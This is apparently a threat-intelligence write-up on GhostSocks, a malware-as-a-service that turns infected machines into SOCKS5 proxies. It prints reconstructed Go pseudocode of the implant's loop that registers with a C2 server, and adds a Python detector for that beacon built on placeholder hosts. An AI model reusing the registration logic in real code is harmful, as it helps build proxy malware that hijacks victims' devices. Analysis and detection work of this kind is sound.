An operator known as GhostSocks advertised a novel Malware-as-a-Service (MaaS) on the Russian cybercrime forum XSS.is on October 15, 2023, promising to transform compromised devices into residential SOCKS5 proxies.
The service capitalized on the inherent trust placed in residential IP addresses to bypass anti-fraud systems and avoid detection by network defenders.
Early promotional posts showcased a web-based control panel that offered centralized management of devices, sub-accounts, and automated build generation for both Windows and UNIX targets.
The GhostSocks MaaS model eliminates the need for threat actors to maintain external proxy servers, reducing operational costs and infrastructure complexity.
Builds are compiled in native Go and range from 3 MB before obfuscation to 8 MB afterward, leveraging the open-source garble project for string and symbol obfuscation.
Once deployed, GhostSocks runs entirely in memory, providing SOCKS5 functionality without implementing its own persistence mechanism.
Synthient analysts noted the malware’s reliance on other initial-access tools, such as LummaStealer, to gain footholds on victim systems, underscoring the interconnected nature of modern threat actor ecosystems.
The service quickly gained traction beyond low-level cybercriminals; leaked BlackBasta ransomware chat logs from February 2025 reveal discussions about integrating GhostSocks alongside LummaStealer to maintain long-term network access without raising suspicion.
In the aftermath of law enforcement takedowns of LummaStealer infrastructure, GhostSocks continued to operate, albeit with reduced visibility on underground forums.
Its resilience highlights the adaptability of MaaS offerings in the continually evolving cybercrime landscape.
Infection Mechanism
GhostSocks deployments typically begin with a dropper delivered by a separate malware family. Upon execution, the GhostSocks binary first acquires a global mutex named "start_to_run" to prevent multiple instances.
It then searches the %TEMP% directory for a configuration file; if none is found, it falls back to a hardcoded encrypted blob.
After decrypting this blob, GhostSocks iterates over a list of embedded C2 URLs until a successful HTTP 200 response is returned, at which point it provisions SOCKS5 credentials.
The following pseudocode illustrates the relay resolution loop:
// Relay resolution loop (pseudocode reconstructed from the sample): try each
// embedded C2 URL in turn until one answers HTTP 200, then provision SOCKS5.
for _, url := range c2List {
	resp, err := http.Get(url + "/apihelper-first-register?buildVersion=" + version +
		"&proxyPassword=" + pwd + "&proxyUsername=" + user)
	if err != nil {
		continue // relay unreachable, try the next one
	}
	if resp.StatusCode != http.StatusOK {
		resp.Body.Close() // release the connection before moving on
		continue          // relay alive but registration refused
	}
	creds := extractCredentials(resp.Body) // parse SOCKS5 credentials from the response
	resp.Body.Close()
	setupSocks5(creds) // start the back-connect SOCKS5 session with those credentials
	break
}
After registration, GhostSocks spawns a back-connect SOCKS5 session using the open-source go-socks5 and yamux libraries, effectively turning the victim host into a transparent relay for downstream clients.
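As an added defensive example (not part of the article or of the malware's own code), the Python script below flags the registration beacon described above in egress HTTP logs; the log format, hostnames and addresses are constructed placeholders, not real indicators.

```python
"""Flag GhostSocks C2 registration beacons in egress HTTP logs."""
from urllib.parse import urlsplit, parse_qs

# Endpoint path and query keys taken from the article's pseudocode.
REGISTRATION_PATH = "/apihelper-first-register"
REGISTRATION_KEYS = {"buildVersion", "proxyPassword", "proxyUsername"}


def classify_request(url):
    """Return a finding dict if url matches the registration pattern, else None."""
    parts = urlsplit(url)
    if parts.path != REGISTRATION_PATH:
        return None
    query = parse_qs(parts.query)
    if not REGISTRATION_KEYS.issubset(query):  # the three keys are always sent together
        return None
    return {"c2_host": parts.hostname, "build_version": query["buildVersion"][0]}


def scan_log(lines):
    """Scan lines of the constructed format '<ts> <src_ip> <method> <url> <status>'."""
    findings = []
    for line in lines:
        fields = line.split()
        if len(fields) != 5:
            continue  # malformed line, skip rather than crash
        ts, src_ip, _method, url, status = fields
        hit = classify_request(url)
        if hit is None:
            continue
        hit.update(timestamp=ts, src_ip=src_ip, status=int(status))
        # 200 means the host was issued SOCKS5 credentials; a non-200 is still a
        # beacon worth triaging, since the implant simply moves to the next C2.
        hit["provisioned"] = hit["status"] == 200
        findings.append(hit)
    return findings


# Constructed sample lines; hosts and addresses are placeholders, not indicators.
SAMPLE_LOG = [
    "2025-02-01T10:00:01Z 10.0.0.5 GET http://c2-a.example/apihelper-first-register"
    "?buildVersion=1.2&proxyPassword=p&proxyUsername=u 503",
    "2025-02-01T10:00:02Z 10.0.0.5 GET http://c2-b.example/apihelper-first-register"
    "?buildVersion=1.2&proxyPassword=p&proxyUsername=u 200",
    "2025-02-01T10:00:03Z 10.0.0.7 GET http://cdn.example/assets/app.js 200",
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Both the failed 503 attempt and the successful 200 registration are reported, mirroring the loop's behaviour of walking the C2 list until one relay accepts the host.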
This infection mechanism allows threat actors to monetize compromised hosts at scale while minimizing detectable network infrastructure.